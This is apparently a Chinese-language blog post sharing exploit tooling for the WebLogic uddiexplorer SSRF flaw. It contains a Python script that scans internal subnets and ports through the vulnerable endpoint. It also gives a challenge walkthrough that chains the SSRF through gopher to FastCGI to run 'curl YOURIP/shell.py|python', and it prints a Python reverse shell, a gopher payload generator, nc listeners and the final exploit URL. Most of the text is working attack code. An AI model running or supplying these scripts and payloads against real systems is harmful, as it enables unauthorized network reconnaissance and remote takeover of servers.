WebLogic SSRF简易的利用脚本

priess1314

这个漏洞可以对内网进行扫描.之前弄过简单的探测，时间久远就给忘记了

 #!/usr/bin/env python

# -*- coding: utf-8 -*-

#WebLogic SSRF And XSS (CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)

#refer:[zxsq-anti-bbcode-url]http://blog.csdn.net/cnbird2008/article/details/45080055[zxsq-anti-bbcode-/url]

 

import re

import urlparse

 

def assign(service, arg):

    if service == 'www':

        return True, arg

 

 

def audit(arg):

    payload = 'uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'

    url = arg + payload

    code, head, res, errcode, _ = curl.curl('"%s"' % url)

    m = re.search('weblogic.uddi.client.structures.exception.XML_SoapException', res)

    if m:

        security_warning(url)

 

if __name__ == '__main__':

    from dummy import *

    audit(assign('www', 'http://www.example.com/')[zxsq-anti-bbcode-1])

但是最近因为有需求.要列出内网的部分信息。于是就修改了这个脚本，方便大批量的扫描应用



#!/usr/bin/env python  

# -*- coding: utf-8 -*- 

import re

import sys

import time

import thread

import requests

  

def scan(ip_str):

    ports = ('21','22','23','53','80','135','139','443','445','1080','1433','1521','3306','3389','4899','8080','7001','8000',)

    for port in ports:

        exp_url = "http://weblogic.0day5.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str,port)

 

        try:

            response = requests.get(exp_url, timeout=15, verify=False)

            #SSRF判断

            re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content)

            #丢失连接.端口连接不上

            re_sult2 = re.findall('but could not connect',response.content)

 

            if len(re_sult1)!=0 and len(re_sult2)==0:

                print ip_str+':'+port

 

        except Exception, e:

            pass

         

def find_ip(ip_prefix):

    '''

    给出当前的192.168.1 ，然后扫描整个段所有地址

    '''

    for i in range(1,256):

        ip = '%s.%s'%(ip_prefix,i)

        thread.start_new_thread(scan, (ip,))

        time.sleep(3)

      

if __name__ == "__main__":

    commandargs = sys.argv[zxsq-anti-bbcode-1:]

    args = "".join(commandargs)

    

    ip_prefix = '.'.join(args.split('.')[zxsq-anti-bbcode-:-1])

    find_ip(ip_prefix)

得到的结果

前不久尝试了一个有php+weblogic+FastCGI的挑战.我们知道SSRF+GOPHER一直都很牛逼，最近更是火热到了不要不要的地步。在drops里面有关于这个的文章http://drops.wooyun.org/tips/16357。简单的说下利用步骤

 nc -l -p 9000 >x.txt & go run fcgi_exp.go system 127.0.0.1 9000 /opt/discuz/info.php "curl YOURIP/shell.py|python"

php -f gopher.php

把payload保存到x.txt。bash反弹无效，改成python来反弹。然后urlencode编码payload生成ssrf.php

 import socket,subprocess,os  

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  

s.connect(("yourip",9999))  

os.dup2(s.fileno(),0)  

os.dup2(s.fileno(),1)  

os.dup2(s.fileno(),2)  

p=subprocess.call([zxsq-anti-bbcode-"/bin/bash","-i"]);

gopher.php

 <?php

$p = str_replace("+", "%20", urlencode(file_get_contents("x.txt")));

file_put_contents("ssrf.php", "<?php header('Location: [zxsq-anti-bbcode-url]gopher://127.0.0.1:9000/_[zxsq-anti-bbcode-/url]".$p."');?>");

?>

成功生成了利用文件ssrf.php

反弹shell

vps上运行监听端口

 nc -lvv 9999

利用SSRF

 [zxsq-anti-bbcode-url]http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%20location&btnSubmit=Search&operator=YOURIP/ssrf.php[zxsq-anti-bbcode-/url]

如果利用成功则会成功反弹